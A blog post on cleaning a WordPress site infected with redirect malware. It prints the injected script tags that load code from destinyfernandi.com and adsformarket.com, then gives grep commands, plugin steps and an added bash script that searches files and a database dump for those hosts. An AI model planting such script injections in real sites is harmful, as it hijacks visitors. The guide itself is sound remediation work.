WordPress Malware: destinyfernandi or adsformarket

Published: 2021-01-23

Before you start

Whenever you start working on a site, always create a backup!

Issue

Today, a client told me to clean their site, which had redirects on every page, making their site vulnerable and flagged by Google. Identifying the issue was very simple: “View source”. There I found the following:

<script type='text/javascript' src='https://slow.destinyfernandi.com/same.js'></script>
<script type='text/javascript' src='https://snippet.adsformarket.com/same.js'></script>

Identifying Unwanted Files with Wordfence

One of the things I usually do is run Wordfence. You really only need this plugin to identify bad files, which you then clean manually via FTP. You can remove the plugin when you are done, since, depending on your server, it’s very likely to slow it down.

Cleaning Files Manually

Now, I am on a Windows system, and I wanted to take a shortcut. I downloaded all the files via FTP; of course, I zipped them first so that I could do this in less than a minute. If you have SSH access, you can gzip the whole WordPress directory. If you use a panel of some sort, you can select everything and zip it.

Once extracted on my computer, with the help of git-scm, I opened a bash window where I was able to run Linux commands. I just had to run the following:

$ grep -ril destinyfernandi *
$ grep -ril adsformarket *

Basically, I wanted to search everywhere: -r searches files recursively, -i ignores upper and lower case, and -l outputs the names of matching files only.

I found all the files where the script was, and just went through them manually and erased them. Very simple and straightforward.

Cleaning Database

This step was simple. First I downloaded the “Better Search Replace” plugin for WordPress. Then I searched for the whole JavaScript string above and replaced it with nothing. This should take care of posts and pages where this appears. It even clears that string from the database itself.

Next, I logged in to the database with phpMyAdmin, exported the database, and opened the export on my local computer. I did a simple search for the string that I wanted gone; if it’s not there anymore, you are basically done. If you still have some instances, you can easily locate them in your database and get rid of them.
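
The file search and the final check of the exported database can be combined into one re-runnable script. This is an added example, not part of the original post: the function names, the directory layout and the sample files are constructed for illustration. It goes slightly beyond the commands above by searching the directory itself instead of "*", so top-level hidden files are included too.

```shell
#!/usr/bin/env bash
# Added example: re-check an extracted site copy and an exported SQL dump
# for the two injected script hosts.

# Hosts from the <script> tags found in the page source.
IOC='destinyfernandi\.com|adsformarket\.com'

# infected_files DIR: print every file under DIR that references either host.
# Searching DIR itself rather than "*" also covers top-level dotfiles.
infected_files() {
    grep -rilE -- "$IOC" "$1" 2>/dev/null | sort
}

# dump_hits FILE: number of lines in an exported .sql dump that still match.
# grep -c prints 0 but exits 1 when nothing matches, hence "|| true".
dump_hits() {
    grep -icE -- "$IOC" "$1" || true
}

# verify_clean DIR DUMP: succeed only when neither the files nor the dump match.
verify_clean() {
    [ -z "$(infected_files "$1")" ] && [ "$(dump_hits "$2")" -eq 0 ]
}

# make_sample ROOT: constructed sample data standing in for a downloaded site
# (ROOT/site) and a phpMyAdmin export (ROOT/export.sql).
make_sample() {
    mkdir -p "$1/site/wp-content/themes/demo"
    printf '%s\n' "<script type='text/javascript' src='https://slow.destinyfernandi.com/same.js'></script>" \
        > "$1/site/wp-content/themes/demo/header.php"
    printf '%s\n' "<SCRIPT SRC='https://snippet.ADSFORMARKET.com/same.js'></SCRIPT>" \
        > "$1/site/.old-header.php"
    printf '%s\n' '<?php // clean file' > "$1/site/index.php"
    printf '%s\n' \
        "INSERT INTO wp_posts VALUES (1,'<script src=https://slow.destinyfernandi.com/same.js></script>');" \
        "INSERT INTO wp_posts VALUES (2,'hello world');" > "$1/export.sql"
}

demo=$(mktemp -d)
make_sample "$demo"
infected_files "$demo/site"
echo "dump lines still matching: $(dump_hits "$demo/export.sql")"
verify_clean "$demo/site" "$demo/export.sql" && echo "clean" || echo "NOT clean"
rm -rf "$demo"
```

Running verify_clean against the extracted directory and a fresh export after each cleanup pass shows whether any reference is left; it keeps failing until both searches come back empty.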

Need Help?

You can always reach me at 📧 hey@vicentesan.com